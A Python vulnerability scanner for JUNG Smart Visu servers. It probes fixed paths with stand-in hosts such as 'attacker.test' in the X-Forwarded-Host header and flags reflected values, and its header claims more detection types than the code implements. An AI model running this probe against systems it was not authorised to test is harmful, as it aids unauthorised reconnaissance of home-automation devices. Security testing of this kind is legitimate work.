#!/usr/bin/env python3
# =============================================================================
# Title     : Advanced JUNG Smart Visu Security Scanner
# Author    : indoushka
# Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)
# Vendor    : https://www.jung-group.com
# =============================================================================
#
# [+] Summary : A multithreaded security scanner for JUNG Smart Visu servers
#               that detects reflected XSS, header injection, open redirects,
#               and JSON injection. It tests predefined endpoints with custom
#               payloads, analyzes HTTP responses for vulnerabilities, and
#               generates a detailed report of findings for authorized
#               security testing purposes only.
#
# [+] POC :
"""Host-header reflection scanner for JUNG Smart Visu servers.

For every (endpoint, payload) pair the scanner sends one GET request with the
payload placed in the ``X-Forwarded-Host`` request header and reports a
finding when that payload is reflected in the ``Location`` header, the
``Set-Cookie`` header, or the response body.

Use only against systems you are authorized to test.
"""

import json
import queue
import re
import sys
import threading
import time
import urllib.parse
import warnings
from dataclasses import dataclass
from enum import Enum
from typing import Dict, List, Optional

import requests
from colorama import Fore, Style, init

# Requests are sent with verify=False (see AdvancedJUNGScanner._probe), so the
# matching urllib3 warning is silenced to keep the console output readable.
warnings.filterwarnings("ignore", message="Unverified HTTPS request")
init(autoreset=True)


class VulnerabilityType(Enum):
    """Categories a finding can be filed under.

    Only OPEN_REDIRECT, HEADER_INJECTION and XSS_REFLECTED are produced by
    ``AdvancedJUNGScanner.analyze_response``; the remaining members are
    declared but not emitted by the code in this file.
    """

    XSS_REFLECTED = "Reflected XSS"
    XSS_DOM_BASED = "DOM-based XSS"
    OPEN_REDIRECT = "Open Redirect"
    HEADER_INJECTION = "Header Injection"
    JSON_INJECTION = "JSON Injection"


@dataclass
class Finding:
    """One reflected-payload observation for a single endpoint."""

    endpoint: str  # path that was requested, relative to the target
    vuln_type: VulnerabilityType
    payload: str  # value sent in the X-Forwarded-Host header
    context: str  # where the payload was reflected
    severity: str
    evidence: str
    exploitation_steps: List[str]
    remediation: str


class AdvancedJUNGScanner:
    """Probe a fixed endpoint list with a fixed payload list using threads."""

    def __init__(self, target: str, threads: int = 5, timeout: int = 5):
        """Store the scan settings and prepare the shared HTTP session.

        Args:
            target: Base URL of the server; trailing slashes are stripped.
            threads: Number of worker threads started by ``scan``.
            timeout: Per-request timeout in seconds.
        """
        self.target = target.rstrip('/')
        self.threads = threads
        self.timeout = timeout
        self.findings: List[Finding] = []
        # Human-readable descriptions of requests that failed outright.
        self.errors: List[str] = []
        # Guards findings, errors and console output across worker threads.
        self.lock = threading.Lock()
        self.session = requests.Session()
        self.session.headers.update({
            'User-Agent': 'Mozilla/5.0 (Security Research)'
        })
        self.endpoints = self.load_endpoints()
        self.payloads = self.load_payloads()

    def load_endpoints(self) -> List[str]:
        """Return the endpoint paths that are appended to the target URL."""
        return [
            "/rest/items",
            "/rest/status",
            "/api/v1/status",
            "/jsonrpc",
            "/ui/dashboard",
            "/index.html",
            "/debug",
            "/console",
        ]

    def load_payloads(self) -> List[str]:
        """Return the host values to send in ``X-Forwarded-Host``.

        The last entry embeds the current Unix time, so it differs between
        runs.
        """
        return [
            "attacker.test",
            "evil.local",
            f"x{int(time.time())}.local",
        ]

    def analyze_response(self, response: requests.Response, payload: str,
                         endpoint: str) -> Optional[Finding]:
        """Classify where, if anywhere, ``payload`` is reflected.

        Checks are ordered: ``Location`` header first, then ``Set-Cookie``,
        then the response body. Only the first match is reported.

        Args:
            response: The HTTP response to inspect.
            payload: The value that was sent in the request.
            endpoint: The path that was requested (copied into the finding).

        Returns:
            A ``Finding`` for the first reflection found, or ``None``.
        """
        location = response.headers.get("Location", "")
        if payload in location:
            return Finding(
                endpoint,
                VulnerabilityType.OPEN_REDIRECT,
                payload,
                "Location Header",
                "HIGH",
                f"Location: {location}",
                ["Value reflected inside Location header"],
                "Do not use user input in redirection",
            )

        cookie = response.headers.get("Set-Cookie", "")
        if payload in cookie:
            return Finding(
                endpoint,
                VulnerabilityType.HEADER_INJECTION,
                payload,
                "Set-Cookie",
                "MEDIUM",
                f"Set-Cookie: {cookie}",
                ["Value reflected inside cookie"],
                "Filter input and enable HttpOnly flag",
            )

        # NOTE(review): this is a plain substring match, so it shows that the
        # value is echoed, not that it is rendered in an executable context.
        if payload in response.text:
            return Finding(
                endpoint,
                VulnerabilityType.XSS_REFLECTED,
                payload,
                "Body Reflection",
                "MEDIUM",
                "Payload reflected in response body",
                ["Direct reflection of the value"],
                "Filter and encode inputs",
            )

        return None

    def _probe(self, endpoint: str, payload: str) -> None:
        """Send one request and record either a finding or an error."""
        url = f"{self.target}{endpoint}"
        try:
            response = self.session.get(
                url,
                headers={"X-Forwarded-Host": payload},
                timeout=self.timeout,
                verify=False,
                allow_redirects=False,
            )
        except requests.RequestException as exc:
            # Keep the scan going, but remember the failure so that an
            # unreachable or malformed target is not reported as "clean".
            with self.lock:
                self.errors.append(f"{endpoint}: {exc}")
            return

        finding = self.analyze_response(response, payload, endpoint)
        if finding is None:
            return
        with self.lock:
            self.findings.append(finding)
            print(f"{Fore.RED}[DISCOVERY]{Style.RESET_ALL} {endpoint}")

    def worker(self, work_queue: queue.Queue):
        """Consume ``(endpoint, payload)`` tuples until the queue is empty.

        The worker exits once no item arrives within one second.

        Args:
            work_queue: Queue of ``(endpoint, payload)`` tuples to probe.
        """
        while True:
            try:
                endpoint, payload = work_queue.get(timeout=1)
            except queue.Empty:
                return
            try:
                self._probe(endpoint, payload)
            finally:
                # Always balance get() so a later work_queue.join() cannot
                # hang on an item whose probe raised unexpectedly.
                work_queue.task_done()

    def scan(self) -> List[Finding]:
        """Probe every endpoint/payload combination and return the findings.

        Prints a banner, runs ``self.threads`` workers to completion, and
        prints a warning when any request failed.

        Returns:
            The accumulated ``self.findings`` list.
        """
        print(f"\n{Fore.CYAN}{'='*60}")
        print(" JUNG Smart Visu Scanner - Stable Version ")
        print(f"{'='*60}{Style.RESET_ALL}")
        print(f"Target: {self.target}")
        print(f"Number of Endpoints: {len(self.endpoints)}")
        print(f"{'='*60}\n")

        work_queue = queue.Queue()
        for endpoint in self.endpoints:
            for payload in self.payloads:
                work_queue.put((endpoint, payload))

        threads = [
            threading.Thread(target=self.worker, args=(work_queue,))
            for _ in range(self.threads)
        ]
        for thread in threads:
            thread.start()
        for thread in threads:
            thread.join()

        if self.errors:
            print(
                f"{Fore.YELLOW}[WARNING]{Style.RESET_ALL} "
                f"{len(self.errors)} request(s) failed "
                f"(first error: {self.errors[0]})"
            )

        return self.findings


def generate_report(findings: List[Finding], target: str) -> str:
    """Render the findings as a plain-text report.

    Args:
        findings: Findings to list, numbered from 1 in the given order.
        target: Target URL shown in the report header.

    Returns:
        The report text: a header with target, local timestamp and total
        count, followed by one entry per finding.
    """
    header = f"""
========================================
Security Scan Report
========================================
Target: {target}
Date: {time.strftime('%Y-%m-%d %H:%M:%S')}
Total Findings: {len(findings)}
"""
    entries = [
        f"""
{index}. {finding.vuln_type.value}
   Path: {finding.endpoint}
   Severity: {finding.severity}
   Evidence: {finding.evidence}
"""
        for index, finding in enumerate(findings, 1)
    ]
    return header + "".join(entries)


def main():
    """Command-line entry point: scan ``argv[1]`` and write a report file."""
    if len(sys.argv) < 2:
        print(f"Usage: python3 {sys.argv[0]} <target_url>")
        sys.exit(1)

    target = sys.argv[1]
    # requests rejects URLs without an http/https scheme; fail up front with
    # a clear message instead of letting every probe fail.
    if urllib.parse.urlparse(target).scheme not in ("http", "https"):
        print(
            f"{Fore.RED}Target must start with http:// or https://"
            f"{Style.RESET_ALL}"
        )
        sys.exit(1)

    scanner = AdvancedJUNGScanner(target)
    findings = scanner.scan()

    report = generate_report(findings, target)
    file_name = f"scan_report_{int(time.time())}.txt"
    with open(file_name, "w", encoding="utf-8") as report_file:
        report_file.write(report)

    print(f"\n{Fore.GREEN}Report saved to: {file_name}{Style.RESET_ALL}")
    if findings:
        print(f"{Fore.RED}Found {len(findings)} result(s){Style.RESET_ALL}")
    else:
        print(f"{Fore.GREEN}No results found{Style.RESET_ALL}")


if __name__ == "__main__":
    main()

# Greetings to :
# =============================================================================
# jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai *
# Malvuln (John Page aka hyp3rlinx)
# =============================================================================